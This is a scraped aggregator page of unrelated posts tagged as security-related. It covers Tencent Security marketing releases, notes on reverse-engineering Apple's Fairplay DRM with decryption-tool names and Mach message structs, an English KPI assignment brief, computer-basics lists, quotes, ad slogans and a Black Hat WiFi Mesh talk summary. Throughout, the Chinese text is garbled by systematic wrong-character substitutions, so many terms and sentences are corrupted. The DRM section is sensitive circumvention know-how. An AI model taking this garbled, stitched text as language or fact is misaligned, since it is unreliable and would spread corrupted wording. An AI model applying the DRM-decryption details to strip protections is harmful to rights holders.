
近日,国内权威钻研机构Forrester公布《Forrester Wave™:2021年第四季度亚太地区企业欺诈治理》报告。腾讯平安在现有服务、产品策略、市场份额三大维度的评比中均为第一,被评为亚太地区企业欺诈治理的“领导者”。 Forrester Wave系列报告旨在为买家提供技术市场上的购买参考指南,并为所有参加评比的技术厂商提供偏心的流程。本次报告Forrester通过三大维度共34项评估规范,遴选出亚太地区市场最具代表性的7家企业欺诈治理供应商,具体出现供应商如何掂量欺诈危险并帮忙企业提供欺诈治理服务。 Forrester指出,近年来随着新型数字商业、领取形式的激增以及数字金融成为常态,交易欺诈变得更加频繁和简单,倡议企业抉择欺诈治理供应商时应关注三大方向:先进的基于人工智能和机器学习的欺诈模型,可疾速响应新的欺诈模式;基于隐衷技术应用更多数据洞察来打击欺诈;灵便的、可定制的工作流程,供数据科学家构建模型。 Forrester在报告中示意,腾讯平安提供直观精密的多租户治理、可视化规定配置和验证能力,让企业的欺诈治理降本增效。同时,在为金融机构开发基于联邦学习的欺诈治理模型中,腾讯平安是最踊跃的技术创新者之一,“腾讯平安是寻求规范解决方案的公司的现实抉择,该解决方案具备丰盛的模型、对分析师敌对的工作流和ML模型开发平台”。 依靠20多年的平安能力积淀,腾讯平安打造了涵盖场景征询、解决方案、风控服务、风控系统等多维度的产品矩阵,并建设了当先的隐衷计算决策体系,企业能够依据本身需要和风控根底,定制化地抉择征询、建模、平台搭建等风控措施。 在金融畛域,针对银行越来越频繁在线上业务的倒退需要,批发信贷已成为银行数字化转型的重要抓手。腾讯平安打造了“获客+风控”一体化的星云批发信贷解决方案,全流程线上操作,最快三分钟放款。不仅能够为客户提供一套欠缺的风控平台和丰盛的AI能力,还领有大量行业专家帮忙银行布局顶层业务,设计全套的风控体系。 同时,腾讯平安一直摸索前沿技术的落地,合规激发数据的价值。基于“联邦学习”解决方案,腾讯平安搭建了首个以区为单位的惠企金融服务平台——实现搀扶精准化、企业不等“贷”,交融了政府部门、金融服务机构、企业多方数据,在参加主体数据不来到本地、爱护隐衷的前提下实现联结建模,得出对小微企业资质的精准画像。在非法合规、爱护隐衷和数据安全的前提下,充沛激活各方数据的生产力,通过优化业务流程、实现精准普惠服务。 截止目前,腾讯平安已笼罩金融畛域超过80%的标杆客户,为中国银行、中国建设银行、中国光大银行、中国民生银行、华夏银行、吉林农信、济宁银行、青岛银行等金融机构提供欺诈辨认、金融级身份认证、避免歹意营销、预防“羊毛党”等服务;累计拦挡超5000万次可疑交易,护航银行平安放款超万亿元。 本次在亚太市场播种的权威认可,也进一步动摇了腾讯平安保卫数字化美妙的信心。将来,腾讯平安将继续整合在金融反欺诈、数字内容、数字营销、身份欺诈等典型欺诈危险的防护能力,为各行各业数字化转型保驾护航。

November 30, 2021 · 1 min · jiezi

关于安全:Fairplay-DRM与混淆实现的研究

钻研Fairplay DRM(Digital Rights Management,即数字版权保护)最要害的两点是受权和加密。但长久以来,对于App DRM的钻研却很少,而就是在这样的前提下,Fairplay DRM又为iOS App的平安钻研叠加了一层“妨碍”。咱们通过剖析混同零碎的设计和实现过程中的问题,克服调试跟踪的阻碍,设计了多种动态和动静的反抗计划;同时通过大量的逆向工程,填补了平安钻研人员对macOS零碎机制中,对于Fairplay这一部分的认知空白。什么是DRM?DRM全称Digital Rights Management,即数字版权保护。苹果为了爱护App Store散发的音乐/视频/书籍/App免于盗版,开发了Fairplay DRM技术,并申请了很多相干的专利,比拟有代表性的如: US8934624B2: Decoupling rights in a digital content unit from downloadUS8165286B2: Combination white box/black box cryptographic processes and apparatusES2373131T3: Safe distribution of content using descifrado keys长久以来,对于App DRM的钻研很少,而DRM的要害是受权和加密。破解Fairplay DRM加密的形式俗称“砸壳”,这是进行iOS App平安钻研的必要前提。自从2013年苹果引入App DRM机制当前,诞生了如Cluth、Bagbak、Flexdecrypt这样的经典“砸壳工具”,而此类“砸壳工具”通常须要越狱设施的反对,因而具备肯定的局限性。 2020年公布的M1 Mac将Fairplay DRM机制引入了MacOS,因为Mac设施的权限没有iOS严格,因而咱们得以在MacOS上摸索更多Fairplay DRM的原理,最终目标是使解密流程不受Apple平台的限度。上面,咱们先来聊聊Apple中是如何实现的? Apple上DRM的实现:Fairplay DRMLC_ENCRYPTION_INFO中的标记加密的MachO含有LC_ENCRYPTION_INFO字段,其中cryptoff标识了加密局部在文件中的起始偏移,cryptsize标识了加密局部的尺寸,cryptid则表明了加密的办法。Fairplay DRM爱护下的App,其加密尺寸为4096的倍数,加密形式标识为1。 而负责解密Mach-O的组件次要包含:内核态的FairplayIOKit和用户态的fairplayd。 Fairplay的OpenMacOS的XNU Kernel中有text_crypter_create_hook这个导出符号,IOTextEncryptionFamily驱动则注册了这个Hook,并作为桥梁,将调用转发给了FairplayIOKit内核驱动。 最终负责解决的函数是: com_apple_driver_FairPlayIOKit::xhU6d1( char const* executable_path, long long cpu_type, long long cpu_subtype, rp6S0jzg** out_handle)尔后,内核中的FairplayIOKit开始初始化,通过host_get_special_port中的unfreed port发送MIG调用到用户态的fairplayd,fairplayd开始解决SC_Info目录下的sinf和supp文件,并将解决的数据返回给内核中的FairplayIOKit。 注:用户态的fairplayd具体工作流程不在本文探讨范畴内。 其中MIG调用的构造如下: struct FPRequest{ mach_msg_header_t header; mach_msg_body_t body; mach_msg_ool_descriptor_t ool; NDR_record_t ndr; uint32_t size; uint64_t cpu_type; uint64_t cpu_subtype;};struct FPResponse{ mach_msg_header_t header; mach_msg_body_t body; mach_msg_ool_descriptor_t ool1; //supf文件映射 mach_msg_ool_descriptor_t ool2; //unk,反比与加密内容的尺寸 uint64_t unk1; uint8_t unk2[136]; uint8_t unk3[84]; uint32_t size1; uint32_t size2; uint64_t unk5;};实现所有调用后,返回的构造rp6S0jzg*理论是一个uint32_t类型的handle,接下来则能够用这个handle来实现解密操作。 ...

November 26, 2021 · 3 min · jiezi

关于安全:IDC报告腾讯安全位居中国态势感知领导者地位

11月22日,IDC正式公布《IDC MarketScape: 中国态势感知解决方案市场2021,厂商评估》报告,腾讯平安凭借全面的网络安全态势感知产品体系、当先的市场策略以及丰盛的行业实际等劣势位居中国态势感知解决方案领导者地位。 此报告中,IDC联合寰球AIRO(网络安全剖析、情报、响应、编排)定义,对中国地区20多家该畛域的次要厂商进行了全面的访谈和评估。在泛滥厂商强烈竞争中,腾讯平安态势感知在放弃“Strategies”(要害策略)主导地位的同时,尤其在“Capabilities”(要害能力)和“Market Presence”(市场体现)两大畛域有了显著晋升。 在业务上云、近程办公、高弹性IT架构等业务需要成为疫情防控新常态下企业数字化转型过程重要组成部分的背景下,企业须要部署越来越多的平安产品和工具,以应答网络边界泛化、歹意威逼激增、法律合规监管等辣手问题。 因而,IDC报告指出,以AIRO为外围构建的态势感知解决方案,成为泛滥企业,尤其是中大型企业的首要抉择。态势感知作为被动平安进攻体系的“智慧大脑”,在企业整体网络安全中正在起到越来越要害的作用。 腾讯平安作为腾讯立足互联网安全的行业品牌,致力于成为产业数字化降级过程中的平安策略官。联合腾讯二十多年反抗黑灰产的教训,腾讯平安打造了态势感知产品——腾讯T-Sec平安经营核心(以下简称“腾讯SOC”)。 腾讯SOC是面向政府、金融、制造业、 医疗、教育等大型企事业单位推出的一款以平安大数据分析和可视化为根底的智能化平安经营平台。通过对海量数据进行多维度剖析、预警,并对威逼做出及时的智能处理,实现企业全网平安态势可知、可见、可控的闭环。 腾讯SOC是以云原生为根底,反对私有云、公有云、IDC、办公网等多云混合云场景的对立平安经营与治理平台。基于对设施、网络、业务环境的深层安全监控、继续平安剖析,联合腾讯当先的威逼情报,构建了云时代场景下,交融威逼进攻、检测、响应溯源和危险预防的平安自适应体系。 腾讯SOC围绕平安经营和风险管理,基于腾讯天幕PaaS的平安算力算法驱动,自下而上构建了 反对日志信息、流量信息、资产信息、破绽和情报信息等海量数据汇聚的大数据层以关联剖析、用户行为剖析(UEBA)、情报分析三大引擎为根底的剖析层以危险资产及脆弱性治理、威逼治理为外围的业务层以3D大屏、手机端等可视化为特色的展现层以考察响应、联动处理、SOAR等自动化技术构建的响应层从而帮忙客户全面晋升平安经营的智能化、自动化和可视化程度,实现平安经营效率的冲破。 腾讯态势感知解决方案,在国内已笼罩次要外围区域,笼罩金融、运营商、政府(监管、主管、部委、省政数局)、交通、终端、出行、教育、医疗、广电、央企、国内GKA企业团体等数十个细分行业,为上百家客户提供实战化产品和服务,助力客户平安能力建设向主动防御阶段转型。 以后新一轮科技反动和产业改革正在减速演进,5G、人工智能、云计算等新技术不断涌现,为经济倒退注入新动能的同时 ,网络安全危险也日益严厉。面对日趋简单的安全形势,腾讯平安将一直积极探索网络安全倒退新途径,放慢技术创新,全面晋升网络安全保障能力,切实为政企数字化转型保驾护航。

November 25, 2021 · 1 min · jiezi

关于安全:key-performance-indicators

OverviewIn this challenge, you will apply your knowledge of key performance indicators (KPIs) and dashboards to create a plan that tracks the performance of web properties for minority- and women-owned businesses.As a product manager, you will often need to measure product performance in the market, as well as the impact of product changes or interventions like a targeted marketing campaign. To accurately judge the impact of change, you must create a baseline of key performance indicators that you track over time. In this challenge, you will create KPIs and Google Analytics dashboards. Knowing what and how to measure, and how to communicate changes and trends in KPIs are critical skills for a product manager. ...

November 24, 2021 · 3 min · jiezi

关于安全:2222

国内外期货交易所以及代码简称国内 上海期货交易所(会员制,不营利,SHFE)大连商品交易所(会员制,不营利,DCE)郑州商品期货交易所(会员制,不营利,CZCE)中国金融期货交易所(公司制,不营利)国外 芝加哥期货交易所(1848-82):CBOT芝加哥期货交易所结算公司(1925):BOTCC伦敦金属交易所(1876):LME纽约商品交易(1933):COMEX纽约商业交易所:NYMEX伦敦的洲际交易所:ICE代码简称 商品基金经理(CPO)商品交易参谋(CTA)交易经理(TM)期货佣金商(FCM)托管人(Custodian)

November 23, 2021 · 1 min · jiezi

关于安全:333333

计算机系统根底组成 硬件零碎(物理零碎)软件系统利用 1.科学计算2.数据处理3.过程管制4.计算机辅助利用5.人工智能6.多媒体利用7.电子商务趋势 1.巨型化2.微型化3.智能化4.网络化5.多媒体化特点 1.运算速度快2.运算精度高3.逻辑运算能力强4.存储容量大5.自动化水平高6.性价比高分类 1.按数据处理形式 数字式计算机模拟式计算机数字模拟混合式计算机2.按计算机性能 巨型计算机大/中型计算机小型计算机微型计算机单片机编码 1.数值型编码 原码反码补码移码2.非数值型编码 BCD码ASCII码汉字编码Unicode数据校验码媒体数据格式 1.图像格式(BMP+GIF+JPG+PSD+TIFF)2.音频格式(WAV+MIDI+MP3+WMA)3.视频格式(AVI+MOV+MPG+RM+FLV)计算档次机构 第0级:微程序机器层,硬件层,由机器硬件间接执行微指令第1级:机器语言层,由微程序解释机器指令零碎第2级:操作系统层,由操作系统程序实现第3级:汇编语言层,为用户提供一种符号形式语言,由汇编程序反对和执行第4级:高级语言层,为不便用户编写应用程序而设置,由各种高级语言编译程序反对和执行。硬件零碎提出人:冯•诺依曼性能部件 运算器控制器存储器 内存储器 1.随机存储器(RAM)2.ROM是只读存储器外存储器 1.软盘2.硬盘3.光盘4.挪动存储设备输出设施 鼠标键盘手写笔摄像机扫描仪等输出设备 打印机显示器绘图仪音箱CPU 组成 运算器控制器寄存器(通用寄存器+专用寄存器)性能指标 主频外频字长多核缓存(CPU和内存之间)主板 系统总线 地址总线(单项)数据总线(双向)管制总线(双向)芯片组 北桥芯片南桥芯片

November 23, 2021 · 1 min · jiezi

关于安全:腾讯主机安全云镜兵器库透视安全事件的千里眼云原生预警系统

之前咱们讲到能够用“疫情防控思路来解决网络安全问题”,提到针对网络攻击的“攻打源、流传路径、易感零碎”等三个环节,别离采取相应措施,可最终解决平安危险。对网络威逼发现越早,处理越快,防控成果也就越好。相同,如果速度不够快,势必造成威逼扩散。这一节,就来讲讲腾讯主机平安(云镜)通过集成云原生预警系统,是如何做到又快又准发现、检测、响应、处理威逼的。 平安成为制约云上业务的天花板随着越来越多的企业将业务上云,企业体验到业务上云带来的灵活性和低经营老本等等益处,但日常面临的平安威逼也让企业平安运维团队深感困扰。云上平安威逼有日益严重的趋势,对平安危险的担心成为制约企业云上业务倒退的天花板。云上业务零碎组件,人造具备互联网产品疾速降级迭代的特点,因组件繁多,安全漏洞也会层出不穷。 从平安经营的现状看,局部企业云资产的基线配置存在危险,业务弱口令和默认配置较为常见。即便曾经部署平安防护软件,但因不足业余治理,存在危险处理不够及时,破绽危险处理迟缓等等问题。如何解决现有企业客户在业余平安人力不足、平安威逼处理能力不强的状况下,无效晋升企业平安经营能力,进步威逼自动化处理能力,成为平安厂商和企业须要迫切解决的问题。 云原生预警系统的工作流程腾讯平安技术核心深知企业客户面临的上述痛点,通过日常平安经营实际,推出云原生预警系统,帮忙客户更快更精确实现威逼检测、威逼响应和威逼预防。 腾讯主机平安云原生预警系统,首先通过在私有云网络中部署大量流量和行为探针、蜜罐零碎,诱惑捕获攻击者对其进行扫描探测、入侵浸透、感化毁坏等攻打流动,从而能够齐全把握攻击者的技战术特点。 钻研人员再依据网络黑产的攻打特点去准确判断全网受影响的状况,去判断黑客的攻打流动造成哪些设施被攻陷,还有哪些设施存在隐患,有可能被攻陷。针对这两种状况采取相应步骤去处理,零碎能够生成一套清晰残缺的操作手册。由腾讯云主机平安(云镜)对所有受影响的主机进行准确告警触达,领导受影响的客户采取最无效措施进行零碎加固和威逼处理。 腾讯主机平安云原生预警系统的工作原理如同业余医师通过各种现代医学科技具体查看病情,能够查明患者身材器官的工作情况,精确剖析病因,再由专家级医师依据病人状况提供最合乎个案特点的医治计划,从而达到药到病除、起死回生的成果。 该零碎的指标是检测威逼->触达客户->领导处理的全自动化实现,在升高客户平安经营老本的同时,大幅晋升平安经营的及时性、准确性和有效性。 腾讯主机平安云原生预警系统的外围为腾讯平安自研的威逼数据和歹意样本剖析引擎:Cyber-Holmes引擎,寓意为“网络空间威逼神探”,该零碎针对海量威逼告警数据进行关联剖析,能够将碎片化的威逼片断还原拼接还原出残缺攻打过程。Cyber-Holmes引擎是腾讯平安中台的基石,其能力已集成到腾讯主机平安(云镜)中,推动云原生预警系统的诞生,腾讯主机平安(云镜)的威逼检测、响应、处理能力及效率随之大幅晋升。 云原生预警系统克服了以往平安厂商公布威逼通告信息时速度不够快,不具备针对性,所提供威逼资讯过于含糊的弱点。企业通过各种渠道会取得较多平安通告资讯,当这些资讯与企业业务关联性不够强时,平安运维团队的感触是:“总是狼来了狼来了,狼到底在哪儿呢,跟我有关系吗?” 当平安通告信息过载时,非常容易被平安运维人员疏忽。腾讯平安云原生预警系统,可精确针对受事件影响的客户量身定制“威逼处理用户手册”,由腾讯云主机平安(云镜)对所有受影响的主机进行准确告警触达,对企业客户运维团队起到相似平安专家面对面的指导作用。 腾讯主机平安(云镜)反对对攻打过程中产生的木马落地文件进行自动检测。客户可登录腾讯云->主机平安控制台,查看病毒木马告警信息,将歹意木马一键隔离。平安运维人员可通过腾讯主机平安(云镜)的破绽治理、基线治理性能对网络资产进行安全漏洞检测和弱口令检测。 腾讯主机平安云原生预警系统的利用实例腾讯主机平安云原生预警系统,是腾讯平安综合中台零碎之一,该零碎在往年7月捕捉YAPI近程代码执行0day破绽在朝利用事件中小试牛刀。 受YAPI近程代码执行0day破绽影响,从7月第1周开始,未部署任何平安防护系统的失陷云主机快速增长。腾讯平安云原生预警系统捕捉到该0day破绽利用事件后,在官网尚无补丁的状况下,准确预警告诉所有受影响的客户迅速采取危险缓解措施。自动化输入事件报告,为客户最终管制0day破绽威逼扩散提供了无力工具。 在最近一次黑产团伙利用Gitlab ExifTool RCE破绽(CVE-2021-22205)大量攻打云主机的事件中(https://mp.weixin.qq.com/s/WQ...),腾讯主机平安云原生预警系统再次当先友商发现威逼。 重磅举荐腾讯主机平安旗舰版发布会将于2022年1月初召开,更多利用实例和技术解读,敬请关注腾讯平安威逼情报中心公众号更新!

November 22, 2021 · 1 min · jiezi

关于安全:金句33

1、生存累,一小半源于生存,一大半源于攀比。 2、纵使你跑得再远,也逃不出我巴掌大的心间。 3、超乎所有之上的一件事,就是放弃青春暮气。 4、不晓得本人毛病的人,一辈子都不会想要改善。 5、年致力,幸福毕生;三年致力,铸就一世辉煌。 6、快过年了,都晒晒本人对象吧,万一有同款呢。 7、我不会说很多难听的情话,但我会陪你一辈子。 8、要去感恩他人对你的好,而不是去习惯和疏忽。 9、白白的过一天,鸿鹄之志,就像犯了窃盗罪一样。 10、那些好的不拆散,最初都被工夫打磨成了不分割。 11、付出的致力总是没有播种,付出的感情得不到回报。 12、所有的事件开始于思维,所有的扭转都能够在霎时。 13、遇到的事件都是参考,只有你本人的抉择才最重要。 14、致力让本人不要吞没在人群里,所以要致力活的丰硕。 15、活着和喘气是两码事,别太满足当初,但要珍惜当下。 16、生命如同一根火柴,只有磨砺才会跳跃出璀璨的火花。 2021最火文案短句致本人语录 17、人活着不是为了本人,而是为了某种信念的力量而活着。 18、或者当初对你来说是大雨滂沱的一年,但天总要放晴的。 19、优于他人,并不高贵,真正的高贵应该是优于过来的本人。 20、任何路线都是靠本人走进去的,而不是靠本人在梦中等来的。 21、事业大成就,生意更短暂。一点公心平似水,非常生意稳如山。 22、成长,就是逼着你一个人,踉踉跄跄的受伤,趔趔趄趄的刚强。 23、人生如梦,暮然回首万事空。嬉笑怒骂即生存,花开花落是人生。 24、在实在的生命里,每桩伟业都由信念开始,并由信念跨出第一步。 25、这个世界上没有坏蛋和好人,只有做了坏事的人,和做了好事的人。 26、想要升职加薪胜利,天然离不开致力拼搏的信心和过程,咱们一起加油吧! 27、每次收压岁钱都要伪装不好意思推来推去的,其实我好怕真的给推走了啊。 28、没有素日的失败,就没有最终的胜利。重要的是剖析失败起因并吸取教训。 29、该吃吃、该喝喝,破事儿别往心里搁;逢人只说三分话,留得七分打天下。 30、慢慢的晓得了,很多货色可遇而不可求,不属于本人的,何必拼了命去在乎。 31、敬爱的本人,因为这世界就是这么不偏心往往在最在乎的事物背后咱们最没有价值。 32、这个世界上基本没有正确的抉择,咱们只不过是要努力奋斗,使当初的抉择变得正确。 33、在人生的任何时候都不怕重头再来,每一个看似低的终点,都是通往更顶峰的必经之路。

November 21, 2021 · 1 min · jiezi

关于安全:回首展望

每到年末总免不了盘点回望,用各异的形式来记录岁月、留住时光。在这其中,文案无疑是一个不错的载体。 回首行将过来的2021年,总有一些文案让你感同身受,触碰到心田的柔软。明天广告界就整顿30句2021年精彩走心的文案。它们有品牌案例、综艺语录、借势文案……模式各不相同,却总有一句能戳中你。(注:排名不分先后) ▼ 01 找失去生存的人, 在哪个城市都能找到家的感觉。 ——支付宝 文案来自支付宝生成的「十年生存账本」。品牌通过记录最近十年领取的生存琐事,再一次唤醒最深处的记忆。与其说打动你的是文案,还不如说是生存。 02 咱们的一句随口说说, 就是父母的大动干戈。 ——唯品会 春节前品牌以“春节-回家”角度,围绕“爱与亲情”用生活化的故事,“以小见大”的探讨当下社会问题。简略的文案意味深长,不由得让人看完后鼻子一酸。 03 我没有来到家, 只是把家带去了远方。 ——方太 每个家的都有不同滋味。品牌将眼光对准衣锦还乡的游子,他们用一块砖一块砖的堆砌起本人的家。有了家味,家就不会走远。 04 人生没有早晓得, 只有当下酒,眼前人。 ——江小白 清明节江小白推出了这波文案。不由得感叹,最懂年轻人的还是江小白。生存总是留有遗憾,人生总会有缺,珍惜当下,平庸也无憾。 05 原来恋情是: 我正要表白,而你也刚好“正在输出”。 ——RIO微醺 同样是酒文案,RIO贴合「微醺」的流传主题,通过5段暗恋故事,传递出柔软、细腻、娇羞的品牌调性。能够说产品海报文案,每一张脸庞都是恋情的模样。 06 爱在日常,才不寻常。 ——京东 & 宝洁 母亲节当天,京东联手宝洁用这样的案例“教育”了“晒妈”的年轻人。品牌围绕#让爱,不只在朋友圈#的主题开展,呐喊人们“用爱填满每一个日常”。 07 我把我种在你身材里 而后一起躲进工夫的褶皱里。 ——杜蕾斯春日诗集 不可否认,杜蕾斯将国人眼中羞于启齿的「污文化」,玩得很高级。杜杜依据四季的个性和人们情感生活上的细节点,创作贴合产品调性的诗集文案,弱化品牌信息、传递两性趣味。你是不是霎时被圈粉了呢? 08 我不是天生弱小, 我只是天生要强。 ——蒙牛 世界杯营销期间,蒙牛推出了这句品牌slogan,随同着阿根廷和梅西的戏剧化征程,成为全民social话题。 09 入地给了你太多才华, 就注定不会给你太平坦的路。 ——CCTV 有梅西的中央就少不了C罗。央视为世界杯32强制作的文案海报中,对C罗的形容异样贴切走心。一字一句好像也是激励咱们每一个奋斗中的普通人。 10 年老时所有的误差都能够是天意, 成年后所有天意都了解为误差。 ——《向往的生存》 黄磊这番中年感悟,是兽性的回归。也是洞察人间之后的练达与从容。《向往的生存》为咱们展示了一副如许怡然自得,安稳闲散的生存画卷。更重要的是,不忘初心,一路向前的生活观人生观。 11 总说静不下心读书, 可不读书怎么静下心来? ——网易蜗牛读书 现代人越来越塌实焦虑,总感觉生存不易工夫不够,感觉本人静不下心,更没工夫读书了。品牌通知你了真谛:读书才是最静心的! 12 恋情是, 他不好好爱,我就横刀夺爱。 ——宜家 520网络情人节,宜家向咱们展现了恋情的三个面:“嫉妒”“愤恨”“暴食”。品牌将恋情最实在的样子融入宜家场景,讲述恋情里那揪心、迷人的二三事。 13 云朵很美 , 浪花很美, 星光很美。 ...

November 20, 2021 · 1 min · jiezi

关于安全:全球首家-紫光展锐通过TMMi-5级认证

2021年6月18日,紫光展锐正式取得国内TMMi组织认定的软件测试成熟度模型集成(TMMi)最高等级——L5级认证,成为寰球首家通过该认证的手机芯片设计企业。 TMMi 全称为Test Maturity Model integration(测试能力成熟度集成),是目前国内上具备权威影响力的测试组织成熟度评估模型,由TMMi基金会开发,旨在反对世界各地的组织改良其软件和零碎测试成熟度,其认证体系是企业软件产品品质管理水平最无力的资质证实。 展锐本次参加TMMi 5级认证的16个PA(过程域)项全副以Fully Achieved(最高合乎度)实现。TMMi 5级认证的通过,标记着展锐在测试危险评估机制、测试过程量化治理、缺点预防机制等方面迈上了新的台阶,测试组织成熟度迈入国内顶级程度。 展锐自2019年,发展了全方位治理改革,建设了科学决策机制,引入了IPD(集成产品开发)、CMMI(能力成熟度模型集成)和TMMi(测试成熟度模型集成)等业界先进的科学管理流程,确定了外部研发的能力基线和品质标杆,使研发的决策与评估更迷信、可掂量。通过两年卓有成效的改革动作,展锐成为寰球首家同时荣获TMMi 5和CMMI 4双认证的手机芯片设计企业。TMMi 5级认证的取得,标记着展锐在研发治理与品质流程化上实现了又一次重要冲破,企业管理体系从“有序”到“高效”迈出了松软的一步。

November 19, 2021 · 1 min · jiezi

关于安全:密码学基础概念

同态加密同态加密(英语:Homomorphic encryption)是一种加密模式,它容许人们对密文进行特定模式的代数运算失去依然是加密的后果,将其解密所失去的后果与对明文进行同样的运算后果一样。换言之,这项技术令人们能够在加密的数据中进行诸如检索、比拟等操作,得出正确的后果,而在整个处理过程中无需对数据进行解密。其意义在于,真正从根本上解决将数据及其操作委托给第三方时的窃密问题,例如对于各种云计算的利用。 这始终是密码学畛域的一个重要课题,以往人们只找到一些局部实现这种操作的办法。而2009年9月克雷格·金特里的论文1从数学上提出了“全同态加密”(英语:Fully homomorphic encryption)的可行办法,即能够在不解密的条件下对加密数据进行任何能够在明文上进行的运算,使这项技术获取了决定性的冲破。人们正在此基础上钻研更欠缺的实用技术,这对信息技术产业具备重大价值。 平安多方计算平安多方计算(英文:Secure Multi-Party Computation)的钻研次要是针对无可信第三方的状况下,如何平安地计算一个约定函数的问题。平安多方计算是电子选举、门限签名以及电子拍卖等诸多利用得以施行的密码学根底。[[1]](https://zh.wikipedia.org/wiki...) 一个平安多方计算协定,如果对于领有有限计算能力攻击者而言是平安的,则称作是信息论平安的或无条件平安的;如果对于领有多项式计算能力的攻击者是平安的,则称为是密码学平安的或条件平安的。 平安多方计算起源于1982年姚期智的百万富翁问题。起初Oded Goldreich有比拟粗疏零碎的阐述。

November 18, 2021 · 1 min · jiezi

关于安全:实战案例丨腾讯安全托管服务MSS助力数字广东重保期间0事故

“电子政务”放慢实现让数据多走路,让大众少跑腿。但政务零碎中存储了大量民生根底数据,一旦产生事变结果将不堪设想。特地是节庆日等重要工夫节点,更是平安保障服务的重中之重。 客户名片数字广东网络建设有限公司(数字广东),承当省级电子政务基础设施和零碎的建设运维工作,先后推出面向民众的挪动政务服务平台“粤省事”、面向企业的挪动政务服务平台“粤商通”、面向公职人员的挪动办公平台“粤政易”。同时为广东省“数字政府”改革建设提供政务云平台、政务大数据中心、公共撑持平台三大根底资源平台,多方面助力“数字政府”建设。 客户痛点在往年某重要节日期间,数字广东将保障电子政务系统安全稳固运行,作为最重要的工作。关键时期,数字广东重保服务亟需解决三大外围痛点: 工作重大关乎数字广东改革建设成绩,波及重大节日网络舆情,单靠外部惯例平安团队难以独立实现; 范围广波及全省约70%的电子政务零碎,涵盖全省14处欠发达地市政务业务,范围广、体量大,对效率和准确度要求高,传统的“堆人”形式无奈实现工作,须要麻利精准的自动化平安平台提供平安经营保障和有实战经验的专业化团队主导反对; 要求高确保最终平安保障后果以外,须要阶段性汇报工作停顿,对平安服务交付过程的标准化、显性化、可视化提出更高的要求。 解决方案针对数字广东的外围痛点,腾讯平安提供平安托管服务MSS,打造重点期间的网络安全“盾牌”。历经“组织筹备-自检加固-攻防演练-重保值守-总结汇报”5个阶段,最终获得重保期间0安全事件、0安全事故、0业务故障的成绩,让全省70%政务零碎运行无忧。 组织筹备阶段节日前3月,腾讯平安团队启动本次重保我的项目,开始与数字广东一起编制可执行可落地的重保计划,设计组织架构,确定具体工作计划,明确我的项目团队工作职责; 自检加固阶段在打算框架内有序实现资产梳理、平安检测与设施更新; 攻防演练阶段腾讯平安负责防御的红队基于多年的红蓝反抗教训,历时半月最终在攻防演练的后半阶段,以0day冲破了几处外围零碎,实现重要外围零碎的破绽开掘工作; 重保值守阶段多名平安专家投入到重保工作中,24小时不间断值守,确保安全十拿九稳。 基于腾讯平安托管服务MSS,最终,重保团队的工作成绩取得了数字广东及广东省政务服务数据管理局的认可。 客户评估张报明:数字广东信息安全部副总经理 “通过与腾讯平安这样的第三方厂商进行单干,曾经成为数字广东[平安建设]降本增效的一个典型案例。” 腾讯平安托管服务MSS腾讯平安托管服务MSS涵盖平安评估、危险监测、破绽感知与危险监测、安全监控、危险处理和应急响应六大服务。可能疾速响应主机、网络、利用、数据等平安产品的各类平安危险事件,进而晋升用户经营效率,保障用户业务平安。 (MSS服务框架) 智能高效自研事件编排引擎,构建自动化工作流零碎,实现事件的自动化扫描及监控,梳理集成超过 15 类平安产品数据,上线超过 10 多个平安编排剧本,能够高效剖析云上用户威逼以及生成响应解决方案。 云原生能力腾讯平安托管服务MSS 原生集成云 CVM、云数据库、云存储、云平安产品局部数据及能力,用户在应用云产品的时候,无需进行二次对接和开发,即可疾速获取各类云上资产危险态势,通过 MSS经营平台对立出现。 云最佳实际腾讯平安托管服务MSS 应急响应团队每年解决超过 100 多起各类大型企业入侵案例,并配合用户进行深入分析和复盘安全事件,逐步造成了云上用户平安经营最佳实际知识库,这些知识库与自动化编排零碎联合,能疾速发现云上用户资产安全隐患,并提供危险处理加固决策撑持。 多重平安情报通过破绽情报+威逼情报组合,可能更快的发现针对云用户的攻打事件预警和利用特色信息,领导平安经营剖析方向和危险处理操作,提前将危险进行收敛,防患未然。 降本增效毋庸企业专门招聘云平安经营团队和管理人员,腾讯平安托管服务MSS提供重复性事件响应分析能力,企业可专一于业务开发和经营。 计划价值提供业余的安全事件处理倡议,疾速实现安全事件闭环,无效进步告警、事件的响应处理效率和成果。从人防到技防,原生集成腾讯云平安产品事件原始数据,及时发现可疑入侵或异样,无效反抗内部入侵攻打。腾讯平安产品弱小的数据处理、剖析、关联能力,可在重保期间提供涵盖“监测预警-研判剖析-响应处理-溯源追踪”全流程、强有力的平安撑持。将来,腾讯平安托管服务MSS所代表的被动检测与继续响应服务,将逐步转变传统的被动应用安全设备和环境运维服务观点。在可能面临的破绽与攻打背后,以平安值守能力侧面反抗。

November 17, 2021 · 1 min · jiezi

关于安全:Black-Hat-Europe-2021议题解读WiFi-Mesh中的安全攻击面

近年来,随着万物互联技术的倒退,Mesh技术逐步衰亡,Mesh技术是一种组网技术,可将多个接入点组成同一个网络来提供服务,相比于传统的WiFi组网技术,Mesh组网更稳固,更快,扩展性更强。而WiFi Mesh也凭借着自组织,自治理,自治愈的个性,在将来万物互联的场景中占据重要的位置。 针对WiFi Mesh的新兴场景,在本次Black Hat Europe 2021大会上,百度平安以线上的模式分享了议题《BadMesher: New Attack Surfaces of Wi-Fi Mesh Network》,该议题次要探讨了WiFi Mesh中的平安攻击面,设计并实现了一套自动化破绽开掘工具MeshFuzzer,并展现了其在理论破绽开掘过程中的成果。 **议题解读基本概念 EasyMesh概念 EasyMesh是WiFi联盟推出的一项标准化认证计划,其经验了三个倒退阶段:图 1 EasyMesh倒退流程 2018年,Mesh技术为厂商各自实现,不足对立的规范,因而不同厂商的设施之间无奈互联互通。 2019年,WiFi联盟推出EasyMesh V1版本,引入了Onboarding流程和Auto-Config流程,并应用1905控制协议来实现Mesh中大部分的管制性能。 2020年,WiFi联盟推出EasyMesh V2和V3版本,V3版本丰盛了更多的管制个性,尤其减少了平安个性,为管制音讯增加了受权和完整性校验。 目前通过EasyMesh认证的厂商曾经有数十家,其中包含Mediatek、Huawei、ZTE等。 EasyMesh架构EasyMesh的架构如图 2所示,其中蕴含两个要害链路,两个要害角色。图 2 EasyMesh架构图 要害链路 1、Fronthaul链路:指的是裸露的WiFi链路,也就是咱们手机可能失常连贯的SSID 2、Backhual链路:指的是暗藏的WiFi链路,即为是无奈搜寻到的SSID,是专门为Mesh提供的链路 要害角色1、Controller角色:Mesh网络的管理者,可向Agent发送控制指令,来实现Mesh网络的治理,达到自组织,自治理,自治愈的成果 